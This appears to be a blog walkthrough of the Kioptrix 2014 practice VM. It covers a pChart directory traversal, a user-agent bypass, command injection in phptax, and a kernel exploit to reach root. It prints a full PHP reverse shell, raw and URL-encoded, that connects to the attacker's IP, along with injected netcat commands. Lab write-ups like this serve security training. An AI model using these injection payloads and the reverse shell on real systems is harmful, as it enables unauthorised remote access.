Kioptrix2014- Walkthrough

Posted: February 13, 2018 Under: Article/Write-ups By No Comments

I started this box with a netdiscover

nmap scan found some ports


I browsed to port 80 to find

Checking the page source gives us our next clue

Let’s browse to “pChart2.1.3…”

I then looked up exploits associated with pchart

In the first link, I followed the directory traversal vuln instructions

And received a output of the passwd file!

I wanted to access more config files on the system. So I googled “freebsd default apache directory” and found the following site:

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwig6eSF25HWAhWnxVQKHWklCkwQFggoMAA&url=https%3A%2F%2Fwww.freebsd.org%2Fdoc%2Fhandbook%2Fnetwork-apache.html&usg=AFQjCNHtF30jDaRyJGFwvCAEqLrd0crTcg

It goes on to say that the default dir is /usr/local/etc/apache2x/httpd.conf where x is the apache version (Apache 2.2 in our case). I added apache22 and browsed to the url to find:

After browsing through the file, it looks like our next target is the webserver on port 8080. Looks like we need to specify the user agent string to get access though

Mozilla/4.0 Mozilla4_browser

I used a tool called “User Agent Switcher” to change my user agent string. I had to create a new entry with the info above. I selected the profile and browsed to the site

We are presented with a directory

Phptax presents us with:

The source file revealed the program name, but not much else

I looked up “phptax exploit” in google and found a related RCE exploit

I had to submit an http request for a nc bind port, I changed the request around to connect back to my user

I tried http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20192.168.0.129%201234;&pdf=make

And I would get a response back, but it would terminate immediately..

The command was executing, but there had to be another way we could use this. Let’s try creating a file

http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;enetercodehere;&pdf=make
Let’s verify we can create files with : echo “” > a.php;&pdf=make

Put the command in https://meyerweb.com/eric/tools/dencoder/ to encode it, then submit the request in the browser

http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3C%3Fphp%20phpinfo()%20%3F%3E%22%20%3E%20info.php;&pdf=make

And entering it in the browser:

Now let’s go to http://192.168.0.135:8080/phpinfo/info.php to reveal

Ok, let’s write a php shell and browse to it to generate a shell!

I encoded the following command to generate a php file called shell.php:

echo “<“!–?php set_time_limit (0); \$VERSION = \”1.0\”; \$ip = \”192.168.0.129\”; \$port = 1234; \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = \”uname -a; w; id; /bin/sh -i\”; \$daemon = 0; \$debug = 0; if (function_exists(\”pcntl_fork\”)) { \$pid = pcntl_fork(); if (\$pid == -1) { printit(\”ERROR: Cant fork\”); exit(1); } if (\$pid) { exit(0); } if (posix_setsid() == -1) { printit(\”Error: Cant setsid()\”); exit(1); } \$daemon = 1; } else { printit(\”WARNING: Failed to daemonise. This is quite common and not fatal.\”); } chdir(\”/\”); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30); if (!\$sock) { printit(\”\$errstr (\$errno)\”); exit(1); } \$descriptorspec = array( 0 => array(\”pipe\”, \”r\”), 1 => array(\”pipe\”, \”w\”), 2 => array(\”pipe\”, \”w\”) ); \$process = proc_open(\$shell, \$descriptorspec, \$pipes); if (!is_resource(\$process)) { printit(\”ERROR: Cant spawn shell\”); exit(1); } stream_set_blocking(\$pipes[0], 0); stream_set_blocking(\$pipes[1], 0); stream_set_blocking(\$pipes[2], 0); stream_set_blocking(\$sock, 0); printit(\”Successfully opened reverse shell to \$ip:\$port\”); while (1) { if (feof(\$sock)) { printit(\”ERROR: Shell connection terminated\”); break; } if (feof(\$pipes[1])) { printit(\”ERROR: Shell process terminated\”); break; } \$read_a = array(\$sock, \$pipes[1], \$pipes[2]); \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null); if (in_array(\$sock, \$read_a)) { if (\$debug) printit(\”SOCK READ\”); \$input = fread(\$sock, \$chunk_size); if (\$debug) printit(\”SOCK: \$input\”); fwrite(\$pipes[0], \$input); } if (in_array(\$pipes[1], \$read_a)) { if (\$debug) printit(\”STDOUT READ\”); \$input = fread(\$pipes[1], \$chunk_size); if (\$debug) printit(\”STDOUT: \$input\”); fwrite(\$sock, \$input); } if (in_array(\$pipes[2], \$read_a)) { if (\$debug) printit(\”STDERR READ\”); \$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\”STDERR: \$input\”); fwrite(\$sock, \$input); } } fclose(\$sock); fclose(\$pipes[0]); fclose(\$pipes[1]); fclose(\$pipes[2]); proc_close(\$process); function printit (\$string) { if (!\$daemon) { print \”\$string\n\”; } } ?–“>” > shell.php
The final command in the browser was:

http://192.168.0.135:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3C%3Fphp%20set_time_limit%20(0)%3B%20%5C%24VERSION%20%3D%20%5C%221.0%5C%22%3B%20%5C%24ip%20%3D%20%5C%22192.168.0.129%5C%22%3B%20%5C%24port%20%3D%201234%3B%20%5C%24chunk_size%20%3D%201400%3B%20%5C%24write_a%20%3D%20null%3B%20%5C%24error_a%20%3D%20null%3B%20%5C%24shell%20%3D%20%5C%22uname%20-a%3B%20w%3B%20id%3B%20%2Fbin%2Fsh%20-i%5C%22%3B%20%5C%24daemon%20%3D%200%3B%20%5C%24debug%20%3D%200%3B%20%20if%20(function_exists(%5C%22pcntl_fork%5C%22))%20%7B%20%20%5C%24pid%20%3D%20pcntl_fork()%3B%20%20%20%20if%20(%5C%24pid%20%3D%3D%20-1)%20%7B%20%20%20printit(%5C%22ERROR%3A%20Cant%20fork%5C%22)%3B%20%20%20exit(1)%3B%20%20%7D%20%20%20%20if%20(%5C%24pid)%20%7B%20%20%20exit(0)%3B%20%20%7D%20%20%20if%20(posix_setsid()%20%3D%3D%20-1)%20%7B%20%20%20printit(%5C%22Error%3A%20Cant%20setsid()%5C%22)%3B%20%20%20exit(1)%3B%20%20%7D%20%20%20%5C%24daemon%20%3D%201%3B%20%7D%20else%20%7B%20%20printit(%5C%22WARNING%3A%20Failed%20to%20daemonise.%20%20This%20is%20quite%20common%20and%20not%20fatal.%5C%22)%3B%20%7D%20%20chdir(%5C%22%2F%5C%22)%3B%20%20umask(0)%3B%20%5C%24sock%20%3D%20fsockopen(%5C%24ip%2C%20%5C%24port%2C%20%5C%24errno%2C%20%5C%24errstr%2C%2030)%3B%20if%20(!%5C%24sock)%20%7B%20%20printit(%5C%22%5C%24errstr%20(%5C%24errno)%5C%22)%3B%20%20exit(1)%3B%20%7D%20%20%5C%24descriptorspec%20%3D%20array(%20%20%20%200%20%3D%3E%20array(%5C%22pipe%5C%22%2C%20%5C%22r%5C%22)%2C%20%20%20%201%20%3D%3E%20array(%5C%22pipe%5C%22%2C%20%5C%22w%5C%22)%2C%20%20%20%202%20%3D%3E%20array(%5C%22pipe%5C%22%2C%20%5C%22w%5C%22)%20)%3B%20%20%5C%24process%20%3D%20proc_open(%5C%24shell%2C%20%5C%24descriptorspec%2C%20%5C%24pipes)%3B%20%20if%20(!is_resource(%5C%24process))%20%7B%20%20printit(%5C%22ERROR%3A%20Cant%20spawn%20shell%5C%22)%3B%20%20exit(1)%3B%20%7D%20%20stream_set_blocking(%5C%24pipes%5B0%5D%2C%200)%3B%20stream_set_blocking(%5C%24pipes%5B1%5D%2C%200)%3B%20stream_set_blocking(%5C%24pipes%5B2%5D%2C%200)%3B%20stream_set_blocking(%5C%24sock%2C%200)%3B%20%20printit(%5C%22Successfully%20opened%20reverse%20shell%20to%20%5C%24ip%3A%5C%24port%5C%22)%3B%20%20while%20(1)%20%7B%20%20if%20(feof(%5C%24sock))%20%7B%20%20%20printit(%5C%22ERROR%3A%20Shell%20connection%20terminated%5C%22)%3B%20%20%20break%3B%20%20%7D%20%20%20if%20(feof(%5C%24pipes%5B1%5D))%20%7B%20%20%20printit(%5C%22ERROR%3A%20Shell%20process%20terminated%5C%22)%3B%20%20%20break%3B%20%20%7D%20%20%20%5C%24read_a%20%3D%20array(%5C%24sock%2C%20%5C%24pipes%5B1%5D%2C%20%5C%24pipes%5B2%5D)%3B%20%20%5C%24num_changed_sockets%20%3D%20stream_select(%5C%24read_a%2C%20%5C%24write_a%2C%20%5C%24error_a%2C%20null)%3B%20%20%20if%20(in_array(%5C%24sock%2C%20%5C%24read_a))%20%7B%20%20%20if%20(%5C%24debug)%20printit(%5C%22SOCK%20READ%5C%22)%3B%20%20%20%5C%24input%20%3D%20fread(%5C%24sock%2C%20%5C%24chunk_size)%3B%20%20%20if%20(%5C%24debug)%20printit(%5C%22SOCK%3A%20%5C%24input%5C%22)%3B%20%20%20fwrite(%5C%24pipes%5B0%5D%2C%20%5C%24input)%3B%20%20%7D%20%20%20if%20(in_array(%5C%24pipes%5B1%5D%2C%20%5C%24read_a))%20%7B%20%20%20if%20(%5C%24debug)%20printit(%5C%22STDOUT%20READ%5C%22)%3B%20%20%20%5C%24input%20%3D%20fread(%5C%24pipes%5B1%5D%2C%20%5C%24chunk_size)%3B%20%20%20if%20(%5C%24debug)%20printit(%5C%22STDOUT%3A%20%5C%24input%5C%22)%3B%20%20%20fwrite(%5C%24sock%2C%20%5C%24input)%3B%20%20%7D%20%20%20if%20(in_array(%5C%24pipes%5B2%5D%2C%20%5C%24read_a))%20%7B%20%20%20if%20(%5C%24debug)%20printit(%5C%22STDERR%20READ%5C%22)%3B%20%20%20%5C%24input%20%3D%20fread(%5C%24pipes%5B2%5D%2C%20%5C%24chunk_size)%3B%20%20%20if%20(%5C%24debug)%20printit(%5C%22STDERR%3A%20%5C%24input%5C%22)%3B%20%20%20fwrite(%5C%24sock%2C%20%5C%24input)%3B%20%20%7D%20%7D%20%20fclose(%5C%24sock)%3B%20fclose(%5C%24pipes%5B0%5D)%3B%20fclose(%5C%24pipes%5B1%5D)%3B%20fclose(%5C%24pipes%5B2%5D)%3B%20proc_close(%5C%24process)%3B%20%20function%20printit%20(%5C%24string)%20%7B%20%20if%20(!%5C%24daemon)%20%7B%20%20%20print%20%5C%22%5C%24string%5Cn%5C%22%3B%20%20%7D%20%7D%20%20%3F%3E%22%20%3E%20shell.php;&pdf=make

And we received a shell!

Let’s see what the OS and kernel is, then check for exploits

Searched in google

And tried the first one. I downloaded the exploit, and transferred it to the vuln vm with netcat

From my kali box

And on the vuln vm

I ran gcc on the file, chmod’d it and execute to grab a root shell!

I found a congrats.txt file in the root directory

It mentions that OSSEC is installed, and it’s been logging alerts. I thought that was an awesome idea, so I checked out the log

The first thing I saw was the privilege escalation exploit

Then I saw my php reverse shell upload attempts

Then finally my directory traversal attack

And thanks to the author for this 🙂

Awesome VM, great idea to install ossec

Leave a Reply

Your email address will not be published. Required fields are marked *